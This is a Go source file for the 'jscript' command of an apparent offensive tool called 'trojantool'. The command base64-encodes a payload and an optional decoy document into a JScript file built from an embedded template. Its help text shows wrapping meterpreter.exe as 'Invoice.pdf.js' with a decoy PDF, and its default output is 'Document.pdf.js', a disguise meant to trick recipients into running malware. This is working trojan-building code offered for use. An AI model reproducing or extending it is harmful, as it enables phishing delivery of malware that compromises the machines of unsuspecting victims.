package cmd

import (
	_ "embed"
	"encoding/base64"
	"github.com/spf13/cobra"
	"os"
	"text/template"
)

//go:embed jscript.gojs
var jscriptTmpl string

// jscriptCmd represents the jscript command
var jscriptCmd = &cobra.Command{
	Use:   "jscript [flags] payload",
	Short: "Wraps your payload into a JScript file with optional Decoy",
	Long: `JScript is a native Scripting language to Windows without the security features of Powershell, but much more 
powerful than CMD, being essentially a funky version of Javascript
Example:

trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe
`,
	Run: func(cmd *cobra.Command, args []string) {
		type OutData struct {
			Encoded      string
			EncodedDecoy string
		}

		var outData OutData
		tmpl := template.Must(template.New("").Parse(jscriptTmpl))
		if len(args) != 1 {
			cmd.PrintErr("Please specify one Input file! \n")
			_ = cmd.Help()
			os.Exit(1)
		}
		input := args[0]
		if input == "" {
			cmd.PrintErr("You need to specify an input file!")
		}
		output, _ := cmd.Flags().GetString("output")

		content, err := os.ReadFile(input)
		if err != nil {
			cmd.PrintErrf("Could not read Input file: %s", err)
		}
		outData.Encoded = base64.StdEncoding.EncodeToString(content)

		decoy, err := cmd.Flags().GetString("decoy")
		if err != nil {
			cmd.PrintErrf("Could not get Decoy file: %s", err)
		}
		if decoy != "" {
			decoyContent, err := os.ReadFile(decoy)
			if err != nil {
				cmd.PrintErrf("Could not get Decoy Content file: %s", err)
			}
			outData.EncodedDecoy = base64.StdEncoding.EncodeToString(decoyContent)
		}

		outFile, err := os.Create(output)
		if err != nil {
			cmd.PrintErrf("Could not create output file: %s", err)
		}
		defer func(outFile *os.File) {
			err := outFile.Close()
			if err != nil {

			}
		}(outFile)
		err = tmpl.Execute(outFile, outData)
		if err != nil {
			cmd.PrintErrf("Could not create output file: %s", err)
		}

	},
}

func init() {
	rootCmd.AddCommand(jscriptCmd)

	// Here you will define your flags and configuration settings.
	jscriptCmd.Flags().String("output", "Document.pdf.js", "This is the Name of the Output file")
	jscriptCmd.Flags().String("decoy", "", "Name of the Decoy file, e.g. Invoice.pdf")

}
